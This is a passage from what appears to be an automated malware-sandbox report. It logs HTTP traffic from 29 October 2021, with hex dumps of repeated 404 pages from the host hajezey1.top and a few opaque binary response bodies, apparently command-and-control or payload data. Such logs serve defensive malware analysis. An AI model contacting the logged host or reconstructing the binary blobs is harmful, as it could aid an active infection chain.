6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c a5 c7 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 a9 85 87 cd 31 81 78 51 a1 a2 8f 00 8e c2 1c e0 32 02 50 08 88 c5 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 01 9c 20 59 55 11 5c 7c 3b 66 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 99 79 d6 8a 5c d8 06 0e 45 07 0e 7d cf f3 e1 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 92 cc 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 ff 64 45 96 da 19 d1 3a 2d e4 5e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 d1 8f 4b 04 38 ad 62 14 2c c6 e9 b1 14 37 6c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 5f 64 cd 25 5c 8d b7 f7 3d 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 91 81 a8 be 34 56 9b 46 76 99 86 11 00 83 32 42 ca 43 ce ae 80 3a 95 36 e1 48 50 67 b6 50 b8 81 0e 76 81 de 33 fb 76 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 f1 b5 60 4a 3a 7d 54 7a 99 6c 39 d1 5e f3 5f 76 4e 63 95 b4 0d 16 cb 9c 51 24 22 7d ec b9 68 62 be 7f 13 eb cd f6 25 15 88 d8 95 7f 8e 4a 9b 16 66 45 a7 0d 7c 8e 24 38 69 81 7d af 01 ec 83 41 66 20 ae b8 ea 21 19 a0 4a 48 61 8c bd 77 6a 67 17 0d f1 ee 22 3b 6f ab e5 84 79 f3 53 d3 e4 9a 24 59 d4 55 23 2c 0f 70 d7 b1 56 09 d6 89 bc 08 81 dd ad 80 41 ca 2a 85 d8 de 3e 67 a0 f5 ba 08 c0 fa 5d e4 1f 28 68 bc fa a5 ed 82 ac 11 40 31 02 1a 1f c1 e0 f7 6f f0 e7 17 d3 87 45 d0 ef 44 e9 cf 81 6c 59 20 9b e9 db f0 c3 05 d4 99 cd 21 42 47 c4 a5 cc 49 55 c8 08 f2 bb d9 39 6f 8b 87 9a 0c ef 0f 4e 88 f0 24 bf 34 fa 8b b4 26 bc 06 46 b0 0c 64 08 d8 fd f8 c9 4a 26 1b 3c 2d 6f 73 74 87 35 60 a0 99 ff 6d 37 d3 ad a1 84 0b 84 f3 9e 98 bb 1f 65 c7 26 f0 3b ee a2 8e f0 03 af 63 96 1d f7 a9 15 15 1c 70 40 cd c9 e1 dd b0 c0 0f 25 99 59 c6 1e aa c6 8e 34 3d f6 46 64 68 de be 9c 98 3f d8 2f eb 53 52 a0 0e 94 97 04 76 f9 1e f3 20 64 84 b9 64 4f 55 a7 fa 5b c3 96 c0 88 0b 39 d9 1d 78 09 dd 90 1a c1 03 7a 06 16 f4 d4 6c d1 79 04 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5e Data Ascii: =^
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
